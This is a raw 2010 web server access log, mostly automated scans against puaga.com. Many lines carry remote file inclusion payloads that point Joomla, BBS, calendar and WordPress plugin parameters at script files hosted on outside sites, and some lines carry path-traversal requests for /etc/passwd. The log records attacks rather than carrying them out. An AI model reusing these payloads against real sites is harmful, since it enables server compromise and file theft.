89.145.92.17 - - [04/Mar/2010:06:41:54 -0800] "GET /logs/access_100203.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:41:57 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:42:03 -0800] "GET /logs/access_100214.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:42:27 -0800] "GET /logs/access_100219.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:42:39 -0800] "GET /logs/access_100203.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /logs/access_100128.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:01 -0800] "GET /logs/access_100128.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:56 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:43:56 -0800] "GET /logs/access_100128.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:44:01 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:45:00 -0800] "GET /logs/access_100214.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:31 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:36 -0800] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:37 -0800] "GET /phpbb/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:41 -0800] "GET /phpbb2/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:42 -0800] "GET /forums/index.php HTTP/1.0" 404 5258 "http://puaga.com/forums/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
86.57.132.148 - - [04/Mar/2010:06:45:44 -0800] "GET /board/index.php HTTP/1.0" 404 5258 "http://puaga.com/board/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
89.145.92.17 - - [04/Mar/2010:06:46:26 -0800] "GET /logs/access_100208.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:06:49:19 -0800] "GET /logs/access_100214.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:06:49:19 -0800] "GET /logs/access_100214.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:06:49:54 -0800] "GET /logs/access_100214.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:50:32 -0800] "GET /logs/access_100220.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:50:32 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:50:32 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:50:54 -0800] "GET /logs/access_100130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:06:52:13 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:06:52:13 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:06:52:13 -0800] "GET /logs/access_100222.log%20%20///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:52:23 -0800] "GET /logs/access_100222.log%20%20///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:52:23 -0800] "GET /logs/access_100217.log%20%20///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:52:23 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:52:23 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:06:52:23 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:06:52:52 -0800] "GET //include/admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:06:52:52 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:06:52:52 -0800] "GET /logs/access_100224.log%20%20///include/admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:53:52 -0800] "GET /logs/access_100220.log///?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:53:52 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:54:07 -0800] "GET /logs/access_100129.log%20%20//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:54:07 -0800] "GET /bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:54:07 -0800] "GET /logs//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:06:54:41 -0800] "GET /logs/access_100217.log%20%20///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:55:39 -0800] "GET /bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:55:39 -0800] "GET /logs//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:06:55:39 -0800] "GET /logs/access_100129.log%20%20//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:58:10 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:58:10 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:58:10 -0800] "GET /logs/access_100210.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:58:18 -0800] "GET /logs/access_100202.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:59:46 -0800] "GET /logs/access_100217.log///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:59:46 -0800] "GET /logs/access_100222.log///bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:07:00:27 -0800] "GET /logs/access_100224.log/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:07:00:27 -0800] "GET /main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:07:00:27 -0800] "GET /logs/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:07:00:45 -0800] "GET /logs/access_100225.log/main.php?pagina=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:07:01:10 -0800] "GET /logs/access_100205.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:07:01:10 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:07:01:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:07:01:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:01:34 -0800] "GET /logs/access_100224.log%20%20//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:01:46 -0800] "GET /logs/access_100211.log//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:01:46 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:01:47 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:07:03:34 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:07:03:34 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [04/Mar/2010:07:03:34 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:07:04:29 -0800] "GET /logs/access_100202.log%20%20//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [04/Mar/2010:07:04:32 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [04/Mar/2010:07:04:34 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [04/Mar/2010:07:04:34 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:04:48 -0800] "GET /logs/access_100224.log%20%20//bbs//include/admin.lib.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:04:50 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
184.73.43.194 - - [04/Mar/2010:07:06:38 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:39 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:39 -0800] "GET /atesh_info/links.js HTTP/1.0" 200 43 "http://atesh.info/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:41 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://atesh.info/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:41 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:44 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:45 -0800] "GET /atesh_info/links.js HTTP/1.0" 200 43 "http://www.atesh.info/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:46 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://www.atesh.info/" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:06:49 -0800] "GET /iphone/ HTTP/1.0" 200 1805 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:07:10 -0800] "GET /mobile/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:07:10 -0800] "GET /m/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:07:11 -0800] "GET /mobi/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" "www.atesh.info"
184.73.43.194 - - [04/Mar/2010:07:07:11 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "atesh.info"
78.110.50.120 - - [04/Mar/2010:07:08:34 -0800] "GET /logs/access_100206.log///////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [04/Mar/2010:07:08:34 -0800] "GET /logs///////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [04/Mar/2010:07:08:34 -0800] "GET //////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:38 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:08:39 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:08:40 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:08:40 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [04/Mar/2010:07:08:44 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:45 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:08:46 -0800] "GET /logs/access_100206.log%20%20/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:09:33 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:09:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:09:34 -0800] "GET /?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:44 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:44 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:44 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:48 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:48 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:09:48 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:09:48 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:09:48 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:09:48 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:09:52 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
